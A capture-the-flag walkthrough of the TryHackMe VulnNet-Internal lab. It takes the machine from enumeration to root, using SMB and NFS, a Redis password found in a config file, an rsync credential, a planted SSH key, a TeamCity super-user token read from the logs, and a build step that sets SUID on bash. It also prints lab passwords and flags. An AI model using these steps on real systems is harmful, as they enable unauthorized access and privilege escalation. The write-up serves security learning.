# Write-up for VulnNet-Internal ## Basic Enumeration ### nmap scan Using the command `nmap -v -sC -sV -p- 10.10.75.134` we get ``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA) | 256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA) |_ 256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100003 3 2049/udp nfs | 100003 3 2049/udp6 nfs | 100003 3,4 2049/tcp nfs | 100003 3,4 2049/tcp6 nfs | 100005 1,2,3 35973/tcp mountd | 100005 1,2,3 50743/udp mountd | 100005 1,2,3 50821/tcp6 mountd | 100005 1,2,3 60228/udp6 mountd | 100021 1,3,4 33804/udp6 nlockmgr | 100021 1,3,4 35968/udp nlockmgr | 100021 1,3,4 38965/tcp6 nlockmgr | 100021 1,3,4 44305/tcp nlockmgr | 100227 3 2049/tcp nfs_acl | 100227 3 2049/tcp6 nfs_acl | 100227 3 2049/udp nfs_acl |_ 100227 3 2049/udp6 nfs_acl 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) 873/tcp open rsync (protocol version 31) 2049/tcp open nfs_acl 3 (RPC #100227) 6379/tcp open redis Redis key-value store 9090/tcp filtered zeus-admin 35973/tcp open mountd 1-3 (RPC #100005) 39613/tcp open mountd 1-3 (RPC #100005) 42041/tcp open java-rmi Java RMI 44305/tcp open nlockmgr 1-4 (RPC #100021) 49833/tcp open mountd 1-3 (RPC #100005) Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -39m59s, deviation: 1h09m16s, median: 0s |_nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: vulnnet-internal | NetBIOS computer name: VULNNET-INTERNAL\x00 | Domain name: \x00 | FQDN: vulnnet-internal |_ System time: 2021-05-26T20:17:39+02:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-05-26T18:17:39 |_ start_date: N/A ``` ## First Flag Enumerating smb `smbclient -L 10.10.75.134` ``` Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers shares Disk VulnNet Business Shares IPC$ IPC IPC Service (vulnnet-internal server (Samba, Ubuntu)) SMB1 disabled -- no workgroup available ``` Lets check out whats inside shares folder `smbclient //10.10.75.134/shares` ``` smb: \> ls . D 0 Tue Feb 2 14:50:09 2021 .. D 0 Tue Feb 2 14:58:11 2021 temp D 0 Sat Feb 6 17:15:10 2021 data D 0 Tue Feb 2 14:57:33 2021 11309648 blocks of size 1024. 3277568 blocks available smb: \> cd temp smb: \temp\> ls . D 0 Sat Feb 6 17:15:10 2021 .. D 0 Tue Feb 2 14:50:09 2021 services.txt N 38 Sat Feb 6 17:15:09 2021 11309648 blocks of size 1024. 3277564 blocks available smb: \temp\> get services.txt getting file \temp\services.txt of size 38 as services.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) ``` So, we got our first flag **THM{0a09d51e488f5fa105d8d866a497440a}** ## Second flag We know there is **NFS** on port 111 so lets check that out. `mkdir mount` `sudo mount -t nfs 10.10.75.134: mount` Upon examination we find `./mount/opt/conf/redis/redis.conf` file. Using grep on the file `grep -r pass redis.conf` ``` # 2) No password is configured. # If the master is password protected (using the "requirepass" configuration # masterauth <master-password> requirepass "B65Hx562F@ggAZ@F" # resync is enough, just passing the portion of data the slave missed while # 150k passwords per second against a good box. This means that you should # use a very strong password otherwise it will be very easy to break. # requirepass foobared ``` Now we can connect to Redis servver with the password found **B65Hx562F@ggAZ@F** `redis-cli -h 10.10.75.134 -a "B65Hx562F@ggAZ@F"` ``` Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe. 10.10.75.134:6379> keys * 1) "internal flag" 2) "marketlist" 3) "tmp" 4) "int" 5) "authlist" 10.10.75.134:6379> get "internal flag" "THM{ff8e518addbbddb74531a724236a8221}" 10.10.75.134:6379> ``` We have our second flag **THM{ff8e518addbbddb74531a724236a8221}** On googleing I found there are different types of key values in redis [LINK](https://stackoverflow.com/questions/37953019/wrongtype-operation-against-a-key-holding-the-wrong-kind-of-value-php) ``` 10.10.75.134:6379> get "authlist" (error) WRONGTYPE Operation against a key holding the wrong kind of value 10.10.75.134:6379> lrange "authlist" 1 10 1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" 2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" 3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" ``` On decrypting the base64 string we get >Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v ### Examining rsync Now we try to connect to rsync server ``` shivam@ubuntu:~/ctf/tryhackme/vuln$ rsync --list-only rsync://10.10.75.134 files Necessary home interaction shivam@ubuntu:~/ctf/tryhackme/vuln$ rsync --list-only rsync://rsync-connect@10.10.75.134/files Password: drwxr-xr-x 4,096 2021/02/01 18:21:14 . drwxr-xr-x 4,096 2021/02/06 18:19:29 sys-internal shivam@ubuntu:~/ctf/tryhackme/vuln$ rsync --list-only rsync://rsync-connect@10.10.75.134/files/sys-internal/ Password: drwxr-xr-x 4,096 2021/02/06 18:19:29 . -rw------- 61 2021/02/06 18:19:28 .Xauthority lrwxrwxrwx 9 2021/02/01 19:03:19 .bash_history -rw-r--r-- 220 2021/02/01 18:21:14 .bash_logout -rw-r--r-- 3,771 2021/02/01 18:21:14 .bashrc -rw-r--r-- 26 2021/02/01 18:23:18 .dmrc -rw-r--r-- 807 2021/02/01 18:21:14 .profile lrwxrwxrwx 9 2021/02/02 19:42:29 .rediscli_history -rw-r--r-- 0 2021/02/01 18:24:03 .sudo_as_admin_successful -rw-r--r-- 14 2018/02/13 00:39:01 .xscreensaver -rw------- 2,546 2021/02/06 18:19:35 .xsession-errors -rw------- 2,546 2021/02/06 17:10:13 .xsession-errors.old -rw------- 38 2021/02/06 17:24:25 user.txt drwxrwxr-x 4,096 2021/02/02 14:53:00 .cache drwxrwxr-x 4,096 2021/02/01 18:23:57 .config drwx------ 4,096 2021/02/01 18:23:19 .dbus drwx------ 4,096 2021/02/01 18:23:18 .gnupg drwxrwxr-x 4,096 2021/02/01 18:23:22 .local drwx------ 4,096 2021/02/01 19:07:15 .mozilla drwxrwxr-x 4,096 2021/02/06 17:13:14 .ssh drwx------ 4,096 2021/02/02 16:46:16 .thumbnails drwx------ 4,096 2021/02/01 18:23:21 Desktop drwxr-xr-x 4,096 2021/02/01 18:23:22 Documents drwxr-xr-x 4,096 2021/02/01 19:16:46 Downloads drwxr-xr-x 4,096 2021/02/01 18:23:22 Music drwxr-xr-x 4,096 2021/02/01 18:23:22 Pictures drwxr-xr-x 4,096 2021/02/01 18:23:22 Public drwxr-xr-x 4,096 2021/02/01 18:23:22 Templates drwxr-xr-x 4,096 2021/02/01 18:23:22 Videos ``` ## Third flag(User flag) We know that the machine has an ssh port open. We can save a copy of our local machine's public key on the server using rsync, and connecting to it using ssh. `cp ~/.ssh/id_rsa.pub authorized_keys` The public on the server in **authorized_keys** file, under **.shh** folder in home directory. `rsync authorized_keys rsync://rsync-connect@10.10.75.134/files/sys-internal/.ssh` Now we can connect to machine using ssh. ### user shell `ssh sys-internal@10.10.75.134` ``` sys-internal@vulnnet-internal:~$ ls Desktop Downloads Pictures Templates Videos Documents Music Public user.txt sys-internal@vulnnet-internal:~$ cat user.txt THM{da7c20696831f253e0afaca8b83c07ab} ``` The user flag is: **THM{da7c20696831f253e0afaca8b83c07ab}** ## Final flag (root flag) Upon goofing around I found a folder named **TeamCity** under root directory. Also I checked ports which are open locally ``` sys-internal@vulnnet-internal:~$ ss -tno State Recv-Q Send-Q Local Address:Port Peer Address:Port ESTAB 0 36 10.10.75.134:22 10.18.118.144:35422 timer:(on,536ms,0) ESTAB 0 0 10.10.75.134:2049 10.18.118.144:907 ESTAB 0 0 [::ffff:127.0.0.1]:55839 [::ffff:127.0.0.1]:8111 CLOSE-WAIT1 0 [::ffff:127.0.0.1]:43969 [::ffff:127.0.0.1]:8111 ESTAB 0 0 [::ffff:127.0.0.1]:8111 [::ffff:127.0.0.1]:55839 ``` Lets try to port-forwarding to look whats going on `ssh sys-internal@10.10.75.134 -L 8111:127.0.0.1:8111` On visiting http://localhost:8111/ we get a TeamCity login page. On clicking *Log in as a Super user* we are redirected. It asks for Authentication token. Reading docs from JetBrains tells us ``` The authentication token is automatically generated on every server start. The token is printed in the server console and [`teamcity-server.log`](https://www.jetbrains.com/help/teamcity/2020.2/teamcity-server-logs.html) under the `TeamCity\logs` directory (search for the "Super user authentication token" text). The line is printed on the server start and on any login page submit without a username specified. ``` I first entered a garbage value and then tried to find token under **/TeamCity/logs**. ``` sys-internal@vulnnet-internal:/TeamCity/logs$ grep -r token 2>/dev/null catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server) catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server) catalina.out:[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server) catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server) catalina.out:[TeamCity] Super user authentication token: 6040920619184437384 (use empty username with the token as the password to access the server) catalina.out:[TeamCity] Super user authentication token: 6040920619184437384 (use empty username with the token as the password to access the server) catalina.out:[TeamCity] Super user authentication token: 6040920619184437384 (use empty username with the token as the password to access the server) ``` On checking the token the actual token is **6040920619184437384** We get access to super user through TeamCity. Now I can create a new project and selected **Build Steps** option. We get a option to select from multiple options. I selected **Command Line** , as we are after privilage escalation. It gives text editor to insert commands. I inserted `chmod u+s /bin/bas` to give suid to bash. I saved it and hit `Run` on top right. Now to we can use `/bin/bash -p` being sys-internal user... And thats it we have a root shell. Hence the final flag is: **THM{e8996faea46df09dba5676dd271c60bd}**